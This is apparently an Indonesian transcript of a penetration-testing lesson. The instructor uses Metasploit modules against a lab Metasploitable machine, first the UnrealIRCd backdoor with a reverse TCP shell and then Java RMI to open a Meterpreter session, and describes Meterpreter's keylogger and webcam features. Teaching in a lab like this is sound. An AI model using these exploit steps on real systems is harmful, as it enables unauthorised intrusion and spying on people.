Masih ada beberapa exploit lagi yang akan kita coba untuk mengexploit Metasploitable. Dan setelah itu, kita akan pindah ke Windows Exploit. Kita akan mengexploit Windows 7, Windows 10, dan bahkan nanti Windows 11. Oke? Dan setelah itu kita akan lanjutkan mengexploit Android. Oke, nah sekarang kita akan kembali mengexploit Metasploitable. Seperti biasa, untuk mengexploit Metasploitable, kita akan men-scan-nya terlebih dahulu untuk melihat service version yang berjalan pada port-port terbuka. Oke, nah sekarang saya sudah men-scan-nya dengan menggunakan opsi SV. Oke, kita akan lihat port yang mana lagi yang belum kita exploit, yang mungkin vulnerable. Oke, kita lihat di sini. Oke, mungkin kita akan coba port 6667. Yang berjalan di situ adalah IRC. Oke, IRC ini adalah singkatan dari Internet Relay Chat. Jadi untuk chat server ya. Yang berjalan di situ adalah Unreal IRCD. Nah, caranya seperti biasa, kita akan cari search exploit untuk Unreal IRCD ini. Oke, jika kita temukan ada search exploit-nya di Metasploit, maka kita akan membuka Metasploit. Oke, nah sekarang kita buka terminal baru. Kita ketik search exploit, kemudian ketik Unreal IRCD. Oke, tekan enter. Dan kalau kita perhatikan di sini, ada satu yang dibuat dengan Ruby, ini artinya berasal dari Metasploit ya. Memang benar di sini Metasploit. Oke, kita akan gunakan ini Unreal IRCD 3.2.8.1 backdoor command execution. Oke, karena ada di Metasploit, maka kita akan membuka Metasploit. Untuk membuka Metasploit, klik MS Console. Oke, tekan enter. Oke, kita akan clear ini. Nah, ketika berada di Metasploit ini, kita akan ketik command search untuk mencari exploit untuk Unreal IRCD. Oke, tekan enter. Dan kita sudah menemukan ada satu exploit. Oke, yaitu exploit Unix IRC Unreal IRCD 3281 backdoor. Oke, kita lihat di sini tahunnya 2010, ranknya excellent. Dan kita akan langsung gunakan exploit tersebut. Kita ketik use, kemudian masukkan nomornya, yaitu nomor 0. Tekan enter. Oke, kita akan clear. Kita akan ketik show option. Oke, tekan enter. Dan ini adalah opsi yang harus kita isi, yaitu IP address dari Metasploitable. Kita ketik di situ set rhost 192.168.50 dan 146. Oke, inilah IP address dari Metasploitable yang berjalan di komputer saya. Kalian cek IP address untuk Metasploitable kalian sendiri ya. Jangan masukkan sama dengan yang ini. Oke, kemudian artport-nya sudah terisi. Apakah masih ada lagi? Kita akan coba langsung ketik run. Apakah bisa berjalan? Oke, ternyata belum. Ini katanya exploit fail karena a payload has not been selected. Kita belum memasukkan payload-nya. Oke, jadi kita harus masukkan payload. Kita clear dulu. Kita akan ketik show payloads. Oke, tekan enter. Oke, kita lihat di sini banyak sekali payload yang bisa kita gunakan. Tapi kita akan cari yang reverse TCP. Oke, yaitu yang nomor 5, payload CMD Unix reverse. Oke, reverse TCP. Kita akan gunakan yang nomor 5 tersebut. Untuk menggunakan payload tersebut, kita ketik set payload. Kemudian masukkan nomornya, yaitu nomor 5. Tekan enter. Oke, kita clear. Nah, kalau payload yang kita gunakan itu adalah reverse TCP, artinya kita harus memasukkan IP address dari Kali Linux kita. Oke. Kalau kita jalankan langsung tanpa masukkan IP address dari Kali Linux, maka dia tidak akan berhasil dan akan gagal lagi. Ini katanya
lhost-nya belum diisi. Oke, jadi kita akan masukkan lhost-nya, set lhost, masukkan IP address dari Kali Linux. Oke, untuk melihat IP address dari Kali Linux, seperti biasa kalian ketik ifconfig. Oke, karena saya sudah tahu IP address-nya, saya akan langsung masukkan saja 192.168.50 dan 212. Tekan enter, dan sekarang ketik lagi run dan tekan enter. Oke, nah sekarang exploitation-nya sedang dimulai. Kita lihat apakah akan berhasil. Oke, nah sekarang kita lihat ini sudah berhasil. Command Shell Session 2 open. Jadi sudah terbuka Command Shell Session 2-nya. Jadi kita di sini bisa langsung gunakan shell-nya. Kita clear. Misalnya kita ketik who am I seperti biasa. Oke, untuk melihat hostname-nya ketik hostname. Ya, hostname-nya metasploitable. Untuk mengecek IP address-nya ifconfig. Dan kita lihat di sini adalah IP address dari metasploitable. Oke, itu artinya kita sudah berhasil mengexploit metasploitable dengan menggunakan Unreal IRCD. Oke. Oke, kita untuk keluar dari sini kita ketik saja exit. Oke. Kemudian kita akan buka kembali sel yang tadi, terminal yang tadi yang hasil scanning. Kita akan lihat lagi port yang mana yang masih bisa kita exploit yang vulnerable. Kita perhatikan di sini, mungkin kita akan coba port yang ini 1099, yaitu pada service Java RMI. Oke. Nah, sama seperti sebelumnya, pertama kita akan cari exploit-nya dengan mengetik search exploit. Oke. Kita ketik saja di bawahnya, misalnya search exploit, ketik Java RMI. Oke. Ternyata tidak ditemukan. Atau mungkin kita langsung saja buka metasploitable. Oke. Atau ini kita tutup dulu. Kita kembali ke yang tadi. Kita clear. Ke sel metasploitable tadi yang masih belum kita tutup ya, masih terbuka. Kita akan ketik di sini search Java RMI, tekan enter. Dan kita sudah temukan sebuah exploit yang cocok untuk Java RMI. Oke. Ya, cuma ada satu exploit. Mungkin ini seharusnya ini lebih dari satu ya. Atau kita ulang search Java, kemudian garis bawah ya, bukan garis strip seperti itu. Kita coba garis bawah RMI, tekan enter. Ya, ini baru benar. Ada lebih dari satu exploit untuk Java RMI ini. Ada 2 exploit, oke, dan ada 2 auxiliary. Yang kita cari adalah yang exploit, bukan yang auxiliary. Yaitu antara nomor 1 dan nomor 3. Nah, kita lihat di sini. Yang nomor 1, exploit multi-miss Java RMI server. Oke, mungkin kita akan gunakan yang ini ya. Yang itu, kalau yang di bawah ini exploit multi-browser. Oke, mungkin kita tidak akan gunakan yang ini. Kita akan gunakan multi-miss. Oke, untuk menggunakan seperti biasa kita ketik use, masukkan nomornya, nomor 1, tekan enter. Oke, kita clear dulu. Kemudian kita show option. Nah, kita lihat opsi yang harus kita isi sama seperti biasa, harus ada rhost-nya. Kita set rhost ke IP address metasploitable. Oke. Kemudian selain itu, port-nya sudah terisi. Kemudian kalau kita perhatikan di sini, payload-nya adalah meterpreter ya. Ini adalah pertama kalinya kita menemukan shell meterpreter. Oke, sebelum-sebelumnya kita tidak menggunakan meterpreter, kita menggunakan shell biasa ya. Oke, bedanya meterpreter dengan shell biasa ini, meterpreter kita akan lebih leluasa untuk mengexploit target mesin. Kita bisa menggunakan berbagai macam perintah seperti
menjalankan screenshot, oke, menjalankan keylogger, mengambil membuka kamera, oke, melalui webcam, melihat real time screen-nya, kita bisa melihat screen recording, kita bisa merekod screen-nya melalui Meterpreter. Banyak sekali yang bisa kita lakukan dengan Meterpreter, oke. Oke, tapi kita akan menjelaskan lebih jelas lagi tentang Meterpreter ketika kita masuk ke Windows Exploit nanti, oke. Mungkin untuk kali ini kita akan jalankan saja exploit yang ini. Kita tidak akan membahas lebih detail tentang Meterpreter untuk saat ini, oke. Kemudian kita lihat opsinya lagi. Sudah tidak ada lagi, mungkin kita akan coba ketik run. Ya, dia akan langsung melakukan exploitation. Kita lihat apakah dia akan berhasil menggunakan Meterpreter. Oke. Meterpreter. Oke, walaupun di sini dikatakan failed, tapi sebenarnya ini sudah berhasil, karena di sini kita lihat Meterpreter-nya sudah terbuka, oke. Kalau seandainya Meterpreter-nya tidak terbuka langsung seperti ini, kalian bisa ketik session, oke. Nanti ada session dan nomor ID-nya. Kalian ketik, untuk menggunakan session-nya, kalian ketik session, kemudian masukkan opsi I, masukkan nomor ID-nya, misalnya ID-nya 4 atau 1, oke. Nah, pada kasus saya ini dia sudah langsung terbuka. Kita baca di sini Meterpreter. Jadi, saya bisa langsung menggunakan Meterpreter. Untuk menggunakan Meterpreter, bisa ketik help di sini untuk melihat komen-komen yang bisa digunakan. Ya, banyak sekali komen-komennya. Kalian bisa baca sendiri core komen-nya, komen-komen dasar. Oke, kemudian komen untuk file system seperti membaca teks, oke, mengcopy, mendelete, mendownload file dan sebagainya. Ada komen untuk ifconfig untuk networking-nya, melihat ngecek IP address dan sebagainya. Sistem comment, ya, melihat local time. Ya, kalian lihat komennya, kemudian baca keterangannya di sampingnya ya. Apa guna dari komen-komen tersebut? Ada komen untuk user interface, sticky event, mouse, screen share, screenshot. Nah, ini kita bisa mengambil screenshot dari Metasploitable menggunakan komen screenshot. Oke, tapi untuk lebih detailnya kita akan gunakan Meterpreter ini ketika kita mengexploit Windows nanti. Oke, mungkin kita akan coba saja screenshot. Dan enter. Oke. Tampaknya tidak berjalan di sini ya. Mungkin kita akan lanjutkan nanti ke Windows Exploit untuk menjalankan screenshot. Oke, namun intinya kali ini kita sudah berhasil mengeksploit Metasploitable melalui Java RMI. Oke. Dan juga tadi kita sudah berhasil mengeksploit Metasploitable melalui IRC atau Internet Relay Chat melalui service Unreal IRCD. Oke, untuk selanjutnya kita akan masuk ke Windows Exploit. Kita akan mulai dengan mengeksploit Windows 7.